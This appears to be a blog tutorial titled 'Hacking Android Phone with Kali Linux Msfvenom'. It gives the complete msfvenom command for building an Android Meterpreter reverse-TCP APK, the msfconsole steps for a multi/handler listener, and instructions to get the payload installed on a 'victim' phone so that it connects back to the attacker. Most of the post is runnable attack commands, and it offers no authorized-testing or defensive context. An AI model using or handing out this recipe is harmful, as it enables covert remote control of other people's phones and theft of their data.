Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the crayon-syntax-highlighter domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home1/ktech37/public_html/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the otw_dcsw domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home1/ktech37/public_html/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the easy-accordion-free domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home1/ktech37/public_html/wp-includes/functions.php on line 6114
Hacking Android Phone with Kali Linux Msfvenom

How to Hack Android Phone with Kali Linux Msfvenom





Hacking Android Phone with Kali Linux Msfvenom

Hacking Android Phone with Kali Linux Msfvenom





H

acking Android With Kali Linux Msfvenom can be very easy using klai linux android meterpreter reverse_tcp which will develop an application with and .APK extension  that contains embedded Meterpreter functionality as well as new functions unique to the Android version of Meterpreter. We will set up a listener (handler) on the attacking machine and then install this developed APK payload onto the phone/tablet  of our Victim and execute it so the device performs a reverse connection to our machine.




Step 1 >    Open Linux Terminal and and get your IP address Using ” ifconfig”

step 1.1 >

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_Address LPORT=Port_Number R > /root/app_name.apk




Example:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.175 LPORT=4444 > /root/Desktop/kryptos.apk

1.Step 1 Android HAcking




Step 2 >

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set LHOST IP_Address    
  5. set LPORT Port_Number  
  6. exploit

Step 3 Android HAcking




Step 3 >  get your The Developed payload to your victim for installation  ( when install and activate you will see the Meterpreter  asking for command likes this

Meterpreter

Your Victim Phone has been Hack  here are some cool stuffs that you can do




Hacking Android Phone with Kali Linux Msfvenom

If this Post was helpful please give us your feedback in the comment section below and like our Facebook Page  Kryptos technology